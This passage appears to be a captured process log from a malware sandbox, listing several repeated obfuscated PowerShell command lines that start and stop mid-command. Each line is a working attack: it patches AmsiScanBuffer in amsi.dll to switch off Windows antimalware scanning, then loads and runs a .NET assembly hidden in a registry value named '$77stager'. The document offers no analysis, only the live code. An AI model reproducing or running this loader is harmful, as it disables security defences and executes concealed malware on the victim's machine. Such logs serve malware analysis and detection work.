'+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+'C'+[Char](108)+'ass'+[Char](44)+'A'+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$wjixLFewAAQ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+'p'+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+','+'H'+'i'+[Char](100)+'e'+'B'+''+'y'+''+'S'+'i'+[Char](103)+''+','+''+'P'+''+[Char](117)+''+'b'+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$KHfbbjTxtDgrPp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+'t'+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$wjixLFewAAQ.DefineMethod(''+[Char](73)+''+'n'+'v'+'o'+'k'+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+','+'H'+'i'+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+'w'+[Char](83)+''+[Char](108)+'ot'+[Char](44)+'V'+[Char](105)+''+[Char](114)+'tu'+[Char](97)+'l',$sQmDMbAxFq,$KHfbbjTxtDgrPp).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'i'+[Char](109)+'e,'+[Char](77)+'a'+[Char](110)+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $wjixLFewAAQ.CreateType();}$pKaYMeFvFaoXp=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+'m'+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+'o'+'s'+[Char](111)+'ft'+[Char](46)+''+'W'+''+'i'+'n'+'3'+'2'+'.'+'U'+[Char](110)+''+[Char](115)+''+'a'+'f'+[Char](101)+'Nat'+[Char](105)+'v'+[Char](101)+'Me'+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$yrgidlErKPfURT=$pKaYMeFvFaoXp.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+'d'+[Char](100)+''+'r'+'e'+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+''+[Char](44)+'Sta'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$pLVGNFAXdVbxTfCJasD=PaZEYykvehlO @([String])([IntPtr]);$lGhyxCthAHAqAWFEytbbww=PaZEYykvehlO @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$qKsPFbEuriR=$pKaYMeFvFaoXp.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+[Char](77)+''+[Char](111)+'du'+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$vDbkCavkILSUfu=$yrgidlErKPfURT.Invoke($Null,@([Object]$qKsPFbEuriR,[Object]('L'+[Char](111)+'a'+[Char](100)+'L'+'i'+''+[Char](98)+'ra'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$qvrncficWzceqzvQC=$yrgidlErKPfURT.Invoke($Null,@([Object]$qKsPFbEuriR,[Object](''+[Char](86)+''+[Char](105)+''+'r'+'t'+[Char](117)+''+'a'+''+[Char](108)+''+'P'+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$NkVqzqB=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vDbkCavkILSUfu,$pLVGNFAXdVbxTfCJasD).Invoke('am'+[Char](115)+''+[Char](105)+''+[Char](46)+'d'+'l'+''+[Char](108)+'');$MnoHkvDZijpBfkZyj=$yrgidlErKPfURT.Invoke($Null,@([Object]$NkVqzqB,[Object](''+'A'+''+'m'+''+'s'+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+'u'+''+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$tMtrqzzrPA=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qvrncficWzceqzvQC,$lGhyxCthAHAqAWFEytbbww).Invoke($MnoHkvDZijpBfkZyj,[uint32]8,4,[ref]$tMtrqzzrPA);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$MnoHkvDZijpBfkZyj,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qvrncficWzceqzvQC,$lGhyxCthAHAqAWFEytbbww).Invoke($MnoHkvDZijpBfkZyj,[uint32]8,0x20,[ref]$tMtrqzzrPA);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+'t'+[Char](97)+'ge'+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oSDxSWZjTtoG{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OyECCwcoPCnNZK,[Parameter(Position=1)][Type]$UfMnhJTCcY)$EYJwCCHjcBu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+'e'+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+'yDe'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+'P'+'ub'+'l'+''+[Char](105)+''+'c'+''+','+''+'S'+''+'e'+'a'+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+[Char](105)+'Cl'+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+'uto'+'C'+''+'l'+'a'+'s'+''+'s'+'',[MulticastDelegate]);$EYJwCCHjcBu.DefineConstructor(''+'R'+'T'+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+'l'+'N'+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+'H'+''+[Char](105)+''+'d'+'e'+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OyECCwcoPCnNZK).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nti'+[Char](109)+'e'+','+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+'d');$EYJwCCHjcBu.DefineMethod('I'+[Char](110)+''+[Char](118)+'o'+'k'+'e','P'+[Char](117)+''+'b'+''+'l'+''+'i'+''+'c'+''+[Char](44)+''+[Char](72)+'ide'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+'o'+''+[Char](116)+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+'',$UfMnhJTCcY,$OyECCwcoPCnNZK).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+'e'+','+''+[Char](77)+'an'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $EYJwCCHjcBu.CreateType();}$EqMKrdJbdepAm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+''+[Char](116)+''+'e'+''+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType(''+'M'+'i'+'c'+''+'r'+''+'o'+'so'+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+'i'+''+[Char](110)+'32'+'.'+''+[Char](85)+''+'n'+'s'+'a'+''+[Char](102)+'e'+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+'o'+'d'+''+'s'+'');$TzQVhRcNSyTwBd=$EqMKrdJbdepAm.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+'dr'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+'S'+'t'+'a'+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KOVKJGiRWzpxdBTEhBU=oSDxSWZjTtoG @([String])([IntPtr]);$XxVHkVQzoXjEVhAHOkzwqH=oSDxSWZjTtoG @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BhgBNqLcmGR=$EqMKrdJbdepAm.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+''+[Char](101)+''+[Char](72)+'a'+'n'+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+'n'+''+[Char](101)+'l'+[Char](51)+''+'2'+''+'.'+''+[Char](100)+'l'+[Char](108)+'')));$tgzLGPFylYPkdN=$TzQVhRcNSyTwBd.Invoke($Null,@([Object]$BhgBNqLcmGR,[Object](''+'L'+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+''+'r'+''+'a'+''+[Char](114)+''+[Char](121)+'A')));$sNRyHRanYKZhcuxwi=$TzQVhRcNSyTwBd.Invoke($Null,@([Object]$BhgBNqLcmGR,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+''+'r'+'o'+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$XkUHcwu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tgzLGPFylYPkdN,$KOVKJGiRWzpxdBTEhBU).Invoke(''+'a'+''+[Char](109)+''+'s'+''+'i'+''+'.'+''+[Char](100)+''+'l'+''+'l'+'');$mAVLIkaXytaPxEuBW=$TzQVhRcNSyTwBd.Invoke($Null,@([Object]$XkUHcwu,[Object](''+'A'+''+[Char](109)+'si'+[Char](83)+''+[Char](99)+'an'+[Char](66)+''+[Char](117)+''+[Char](102)+'f'+[Char](101)+'r')));$IVXQhWNLYO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sNRyHRanYKZhcuxwi,$XxVHkVQzoXjEVhAHOkzwqH).Invoke($mAVLIkaXytaPxEuBW,[uint32]8,4,[ref]$IVXQhWNLYO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$mAVLIkaXytaPxEuBW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sNRyHRanYKZhcuxwi,$XxVHkVQzoXjEVhAHOkzwqH).Invoke($mAVLIkaXytaPxEuBW,[uint32]8,0x20,[ref]$IVXQhWNLYO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'OFT'+[Char](87)+'ARE').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+'sta'+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rkHekTglnsqX{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wQzaDnxoRimYur,[Parameter(Position=1)][Type]$SUGACddmlj)$UhIPLiCFoaf=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+'e'+''+[Char](109)+'or'+[Char](121)+'M'+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+'e'+''+[Char](108)+''+'e'+'g'+[Char](97)+''+[Char](116)+'e'+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+'i'+'C'+[Char](108)+'as'+[Char](115)+''+','+'A'+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$UhIPLiCFoaf.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+'p'+''+'e'+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+'H'+''+[Char](105)+'d'+[Char](101)+'By'+[Char](83)+''+'i'+''+'g'+','+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$wQzaDnxoRimYur).SetImplementationFlags('Ru'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+'M'+''+'a'+'n'+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');$UhIPLiCFoaf.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+'k'+''+'e'+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+',N'+[Char](101)+''+'w'+''+'S'+'lo'+[Char](116)+''+[Char](44)+'V'+'i'+'r'+[Char](116)+'u'+'a'+''+'l'+'',$SUGACddmlj,$wQzaDnxoRimYur).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+'t'+[Char](105)+''+'m'+''+'e'+''+[Char](44)+''+'M'+'a'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $UhIPLiCFoaf.CreateType();}$pxPaFkmyNccCl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+''+[Char](116)+''+'e'+'m.dll')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+'s'+[Char](111)+'f'+[Char](116)+''+[Char](46)+''+[Char](87)+''+'i'+''+[Char](110)+''+'3'+''+'2'+''+[Char](46)+''+'U'+''+'n'+''+[Char](115)+''+'a'+''+[Char](102)+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+'Me'+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+'s');$eaExySPoAbmgvT=$pxPaFkmyNccCl.GetMethod(''+'G'+''+[Char](101)+''+'t'+'P'+[Char](114)+''+[Char](111)+'c'+'A'+'d'+[Char](100)+''+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+''+','+''+[Char](83)+'t'+'a'+''+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WkXHjFfBlXqWxbEfXCc=rkHekTglnsqX @([String])([IntPtr]);$eGEcwzhcbNVvsFXjbbovKy=rkHekTglnsqX @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xUBolCJlXVc=$pxPaFkmyNccCl.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+'o'+[Char](100)+''+'u'+''+[Char](108)+''+'e'+''+[Char](72)+''+'a'+''+'n'+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+'nel'+[Char](51)+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$tjFdTGSkYUKpje=$eaExySPoAbmgvT.Invoke($Null,@([Object]$xUBolCJlXVc,[Object](''+[Char](76)+'o'+[Char](97)+'d'+[Char](76)+''+[Char](105)+'br'+[Char](97)+'ryA')));$VxFnRIdlluYIUiszA=$eaExySPoAbmgvT.Invoke($Null,@([Object]$xUBolCJlXVc,[Object](''+'V'+'i'+'r'+''+[Char](116)+'u'+[Char](97)+'l'+'P'+'r'+[Char](111)+''+[Char](116)+'e'+'c'+'t')));$INswRNk=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tjFdTGSkYUKpje,$WkXHjFfBlXqWxbEfXCc).Invoke(''+[Char](97)+''+'m'+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+'l');$EwOSDUAWTYTcerrRz=$eaExySPoAbmgvT.Invoke($Null,@([Object]$INswRNk,[Object](''+'A'+''+'m'+'siS'+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+'uf'+'f'+''+[Char](101)+''+[Char](114)+'')));$xBlkFYqrTg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VxFnRIdlluYIUiszA,$eGEcwzhcbNVvsFXjbbovKy).Invoke($EwOSDUAWTYTcerrRz,[uint32]8,4,[ref]$xBlkFYqrTg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EwOSDUAWTYTcerrRz,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VxFnRIdlluYIUiszA,$eGEcwzhcbNVvsFXjbbovKy).Invoke($EwOSDUAWTYTcerrRz,[uint32]8,0x20,[ref]$xBlkFYqrTg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+'W'+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+[Char](115)+'t'+'a'+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:uqYCQqirTaEh{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$oouhJDCFkbLMir,[Parameter(Position=1)][Type]$DHTqtNtJxK)$iCyEarXOsiJ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+'l'+'e'+'c'+''+'t'+''+'e'+''+'d'+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+'m'+''+[Char](111)+''+'r'+'y'+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'ate'+[Char](84)+'y'+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c,'+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+','+''+[Char](65)+'uto'+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$iCyEarXOsiJ.DefineConstructor('R'+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+'i'+'g'+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$oouhJDCFkbLMir).SetImplementationFlags(''+'R'+'u'+[Char](110)+'ti'+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+[Char](97)+''+'g'+''+'e'+'d');$iCyEarXOsiJ.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+'o'+''+'k'+''+[Char](101)+'','Pu'+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+'de'+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+'ir'+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$DHTqtNtJxK,$oouhJDCFkbLMir).SetImplementationFlags('R'+'u'+'nt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+'M'+[Char](97)+'na'+'g'+''+'e'+''+[Char](100)+'');Write-Output $iCyEarXOsiJ.CreateType();}$nVnFdDrGEujfm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+'t'+''+[Char](101)+''+'m'+''+'.'+''+'d'+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+'i'+'n'+''+[Char](51)+'2'+[Char](46)+'Unsa'+[Char](102)+''+[Char](101)+'Na'+[Char](116)+'i'+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+'t'+''+[Char](104)+'od'+'s'+'');$zZzclmYUtIjDJT=$nVnFdDrGEujfm.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+'r'+''+[Char](111)+''+[Char](99)+'A'+[Char](100)+'d'+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+'St'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PGfzgdVJIYDlcqYJSNb=uqYCQqirTaEh @([String])([IntPtr]);$XOVZUpRNwLYDtRaQYnzZKn=uqYCQqirTaEh @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YSdheKfdFkX=$nVnFdDrGEujfm.GetMethod(''+'G'+''+[Char](101)+'t'+'M'+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+'e'+'l'+''+'3'+'2'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$VHLeZpnHVZWPkn=$zZzclmYUtIjDJT.Invoke($Null,@([Object]$YSdheKfdFkX,[Object](''+'L'+'o'+[Char](97)+'dL'+'i'+''+'b'+''+[Char](114)+''+[Char](97)+''+'r'+'yA')));$eLIGywxUYnxuhYHjy=$zZzclmYUtIjDJT.Invoke($Null,@([Object]$YSdheKfdFkX,[Object](''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+'l'+[Char](80)+''+'r'+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+'t'+'')));$asCTcqt=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VHLeZpnHVZWPkn,$PGfzgdVJIYDlcqYJSNb).Invoke(''+'a'+''+'m'+''+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'');$dBNUfMLvqAoHVCddD=$zZzclmYUtIjDJT.Invoke($Null,@([Object]$asCTcqt,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+'c'+'an'+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+'e'+'r')));$zIRmcCByGe=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eLIGywxUYnxuhYHjy,$XOVZUpRNwLYDtRaQYnzZKn).Invoke($dBNUfMLvqAoHVCddD,[uint32]8,4,[ref]$zIRmcCByGe);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$dBNUfMLvqAoHVCddD,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eLIGywxUYnxuhYHjy,$XOVZUpRNwLYDtRaQYnzZKn).Invoke($dBNUfMLvqAoHVCddD,[uint32]8,0x20,[ref]$zIRmcCByGe);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+'T'+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+''+[Char](55)+'s'+'t'+''+[Char](97)+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:MbrowHOGIfme{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EKpuAyLjXcnPuH,[Parameter(Position=1)][Type]$oGjSYYGWMF)$HYoWDPOIOiQ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+'e'+''+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+[Char](101)+''+'m'+''+'o'+''+'r'+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType('M'+[Char](121)+''+'D'+'e'+[Char](108)+''+[Char](101)+'g'+'a'+''+'t'+''+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+'s'+''+','+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+'l'+'ed'+[Char](44)+''+'A'+''+'n'+'s'+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+'uto'+[Char](67)+'l'+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$HYoWDPOIOiQ.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+[Char](112)+''+'e'+''+'c'+'ial'+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+'i'+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$EKpuAyLjXcnPuH).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+